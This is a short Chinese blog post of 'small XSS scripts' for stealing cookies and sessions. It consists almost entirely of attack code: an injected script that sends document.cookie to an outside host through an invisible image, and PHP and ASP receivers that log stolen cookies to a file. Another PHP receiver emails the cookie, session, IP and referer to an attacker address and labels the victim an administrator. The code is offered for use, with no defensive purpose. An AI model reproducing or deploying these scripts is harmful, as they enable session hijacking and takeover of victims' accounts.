xss一些小脚本
xss配合php获取cookie和session的脚本
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$to='xxx@yeah.net';
$referer = $_SERVER['HTTP_REFERER'];
$cookie = $_GET['cookie'];
$session = $_GET['session'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$subject='远程XSS获取地址-域名:'.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date('d-m-Y').
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.' '.
$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?></pre>
<pre><script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
PHP版代码:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: '
.$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose
?>
版权声明:本文为李维亮博主的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:http://www.liweiliang.com/372.html
- 上一篇: 移动端web开发笔记
- 下一篇: sublime text 3增加浏览器预览
评论已关闭